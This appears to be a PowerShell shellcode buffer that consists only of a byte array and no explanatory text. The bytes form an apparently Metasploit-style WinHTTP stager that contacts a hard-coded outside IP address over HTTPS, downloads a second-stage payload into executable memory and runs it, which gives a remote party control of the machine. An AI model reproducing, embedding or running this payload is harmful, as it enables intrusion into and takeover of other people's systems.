[Byte[]] $buf = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31
$buf += 0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52
$buf += 0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff
$buf += 0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd
$buf += 0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b
$buf += 0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1
$buf += 0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3
$buf += 0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac
$buf += 0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3
$buf += 0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58
$buf += 0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c
$buf += 0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24
$buf += 0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f
$buf += 0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x74,0x74
$buf += 0x70,0x0,0x68,0x77,0x69,0x6e,0x68,0x54,0x68,0x4c
$buf += 0x77,0x26,0x7,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53
$buf += 0x53,0x53,0x68,0x4,0x1f,0x9d,0xbb,0xff,0xd5,0x50
$buf += 0x53,0x68,0xbc,0x1,0x0,0x0,0xe8,0x8d,0x2,0x0
$buf += 0x0,0x68,0x0,0x74,0x0,0x74,0x0,0x70,0x0,0x73
$buf += 0x0,0x3a,0x0,0x2f,0x0,0x2f,0x0,0x31,0x0,0x39
$buf += 0x0,0x32,0x0,0x2e,0x0,0x31,0x0,0x35,0x0,0x35
$buf += 0x0,0x2e,0x0,0x38,0x0,0x39,0x0,0x2e,0x0,0x31
$buf += 0x0,0x31,0x0,0x3a,0x0,0x34,0x0,0x34,0x0,0x34
$buf += 0x0,0x2f,0x0,0x65,0x0,0x71,0x0,0x75,0x0,0x67
$buf += 0x0,0x32,0x0,0x57,0x0,0x56,0x0,0x4d,0x0,0x4a
$buf += 0x0,0x5f,0x0,0x64,0x0,0x76,0x0,0x62,0x0,0x47
$buf += 0x0,0x35,0x0,0x74,0x0,0x4f,0x0,0x4d,0x0,0x2d
$buf += 0x0,0x47,0x0,0x36,0x0,0x51,0x0,0x2d,0x0,0x47
$buf += 0x0,0x5a,0x0,0x55,0x0,0x53,0x0,0x69,0x0,0x4a
$buf += 0x0,0x70,0x0,0x6a,0x0,0x35,0x0,0x41,0x0,0x4c
$buf += 0x0,0x70,0x0,0x38,0x0,0x31,0x0,0x6c,0x0,0x70
$buf += 0x0,0x76,0x0,0x31,0x0,0x47,0x0,0x46,0x0,0x63
$buf += 0x0,0x52,0x0,0x34,0x0,0x53,0x0,0x50,0x0,0x39
$buf += 0x0,0x5f,0x0,0x36,0x0,0x69,0x0,0x42,0x0,0x4a
$buf += 0x0,0x30,0x0,0x65,0x0,0x37,0x0,0x67,0x0,0x37
$buf += 0x0,0x72,0x0,0x7a,0x0,0x73,0x0,0x66,0x0,0x78
$buf += 0x0,0x68,0x0,0x63,0x0,0x43,0x0,0x42,0x0,0x79
$buf += 0x0,0x69,0x0,0x4f,0x0,0x52,0x0,0x56,0x0,0x56
$buf += 0x0,0x6a,0x0,0x68,0x0,0x41,0x0,0x4f,0x0,0x35
$buf += 0x0,0x69,0x0,0x34,0x0,0x2d,0x0,0x7a,0x0,0x66
$buf += 0x0,0x4e,0x0,0x64,0x0,0x4c,0x0,0x51,0x0,0x58
$buf += 0x0,0x6c,0x0,0x77,0x0,0x62,0x0,0x41,0x0,0x52
$buf += 0x0,0x52,0x0,0x45,0x0,0x76,0x0,0x79,0x0,0x61
$buf += 0x0,0x67,0x0,0x71,0x0,0x74,0x0,0x41,0x0,0x33
$buf += 0x0,0x64,0x0,0x32,0x0,0x30,0x0,0x79,0x0,0x36
$buf += 0x0,0x6f,0x0,0x6c,0x0,0x4d,0x0,0x2d,0x0,0x52
$buf += 0x0,0x4c,0x0,0x59,0x0,0x32,0x0,0x36,0x0,0x54
$buf += 0x0,0x6c,0x0,0x71,0x0,0x78,0x0,0x51,0x0,0x63
$buf += 0x0,0x79,0x0,0x6c,0x0,0x38,0x0,0x49,0x0,0x5a
$buf += 0x0,0x43,0x0,0x56,0x0,0x69,0x0,0x56,0x0,0x2d
$buf += 0x0,0x4e,0x0,0x59,0x0,0x79,0x0,0x46,0x0,0x4b
$buf += 0x0,0x33,0x0,0x43,0x0,0x5f,0x0,0x68,0x0,0x68
$buf += 0x0,0x6b,0x0,0x69,0x0,0x44,0x0,0x31,0x0,0x4e
$buf += 0x0,0x42,0x0,0x44,0x0,0x78,0x0,0x56,0x0,0x71
$buf += 0x0,0x6f,0x0,0x6c,0x0,0x56,0x0,0x79,0x0,0x6f
$buf += 0x0,0x71,0x0,0x59,0x0,0x32,0x0,0x63,0x0,0x2d
$buf += 0x0,0x66,0x0,0x32,0x0,0x75,0x0,0x73,0x0,0x64
$buf += 0x0,0x75,0x0,0x70,0x0,0x71,0x0,0x36,0x0,0x70
$buf += 0x0,0x6e,0x0,0x5a,0x0,0x59,0x0,0x65,0x0,0x0
$buf += 0x0,0x83,0xc7,0x32,0x50,0x68,0x46,0x9b,0x1e,0xc2
$buf += 0xff,0xd5,0x68,0x0,0x1,0x80,0x0,0x53,0x53,0x53
$buf += 0x57,0x53,0x50,0x68,0x98,0x10,0xb3,0x5b,0xff,0xd5
$buf += 0x96,0x83,0xec,0x10,0x89,0xe0,0x57,0x89,0xc7,0x57
$buf += 0x68,0x21,0xa7,0xb,0x60,0xff,0xd5,0x85,0xc0,0x74
$buf += 0x4d,0x8b,0x47,0x4,0x85,0xc0,0x74,0x2a,0x5a,0x83
$buf += 0xea,0x32,0x6a,0x1,0x53,0x53,0x50,0x6a,0x3,0x6a
$buf += 0x3,0x89,0xe0,0x83,0xec,0xc,0x89,0xe7,0x57,0x50
$buf += 0x52,0x8d,0x44,0x24,0x40,0xff,0x30,0x68,0xda,0xdd
$buf += 0xea,0x49,0xff,0xd5,0x85,0xc0,0x74,0x1e,0xeb,0xf
$buf += 0x8b,0x47,0x8,0x85,0xc0,0x74,0x15,0x6a,0x4,0x58
$buf += 0x1,0xc7,0x48,0x89,0x7,0x6a,0xc,0x57,0x6a,0x26
$buf += 0x56,0x68,0xd3,0x58,0x9d,0xce,0xff,0xd5,0x68,0x0
$buf += 0x33,0x0,0x0,0x89,0xe0,0x6a,0x4,0x50,0x6a,0x1f
$buf += 0x56,0x68,0xd3,0x58,0x9d,0xce,0xff,0xd5,0x6a,0xa
$buf += 0x5f,0x53,0x53,0x53,0x53,0x53,0x53,0x56,0x68,0x95
$buf += 0x58,0xbb,0x91,0xff,0xd5,0x85,0xc0,0x75,0x8,0x4f
$buf += 0x75,0xeb,0xe8,0x65,0x0,0x0,0x0,0x53,0x56,0x68
$buf += 0x5,0x88,0x9d,0x70,0xff,0xd5,0x85,0xc0,0x74,0xee
$buf += 0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x68,0x0,0x0
$buf += 0x40,0x0,0x53,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5
$buf += 0x93,0x53,0x53,0x89,0xe7,0x57,0x68,0x0,0x20,0x0
$buf += 0x0,0x53,0x56,0x68,0x6c,0x29,0x24,0x7e,0xff,0xd5
$buf += 0x85,0xc0,0x74,0xc2,0x8b,0x7,0x1,0xc3,0x85,0xc0
$buf += 0x75,0xe5,0x58,0xc3,0x5f,0xe8,0x7,0xff,0xff,0xff
$buf += 0x31,0x0,0x39,0x0,0x32,0x0,0x2e,0x0,0x31,0x0
$buf += 0x35,0x0,0x35,0x0,0x2e,0x0,0x38,0x0,0x39,0x0
$buf += 0x2e,0x0,0x31,0x0,0x31,0x0,0x0,0x0,0xbb,0xf0
$buf += 0xb5,0xa2,0x56,0x6a,0x0,0x53,0xff,0xd5
